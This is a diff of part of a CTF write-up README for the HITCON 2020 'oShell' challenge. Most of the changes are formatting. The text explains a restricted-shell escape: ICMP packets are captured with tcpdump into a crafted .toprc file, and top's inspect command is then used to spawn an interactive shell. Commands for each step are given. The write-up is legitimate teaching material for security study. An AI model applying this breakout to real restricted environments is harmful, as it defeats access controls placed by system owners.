FrenchRoomba/ctf-writeup-HITCON-CTF-2020/oShell/README.md

 ```

 This will simply execute a shell after we choose the `x` inspection option in `top`.
-It's important to note that the tab characters are required and cannot be spaces, and the newlines are also required so that our payload doesn't have extra bytes around it.
+It's important to note:
+* The tab characters before and after `x` are required and cannot be spaces.
+* The newlines before and after the payload are also required so that it doesn't have extra bytes around it.

-## Break Out Part 3 - All together now
+### Break Out Part 3 - All together now

-Putting this together, we can run our icmp modification script on a server we control.
+Putting this together, we can run our ICMP modification script on a server we control.
 We can run `tcpdump -w /home/oShell/.toprc -s 500 icmp` to capture ICMP packets and write them to our `.toprc` file.
 Lastly, we can run `ping [our-server-ip] -c 1` to send a packet.

 This writes a strange, but still valid, file that `top` can read.
-Now we open `top`, press `Y` to inspect a process, `return` to select the default PID, then select `x` (the name of the command we used in our payload), and press `return` a final time.
+Now we open `top`, press <kbd>shift</kbd> + <kbd>y</kbd> to inspect a process, <kbd>return</kbd> to select the default PID, then select <kbd>x</kbd> (the name of the command we used in our payload), and press <kbd>return</kbd> a final time.
 We now have an interactive shell!

 The formatting isn't great, but we can type `ls` to see the directory output in `/`:
 ```sh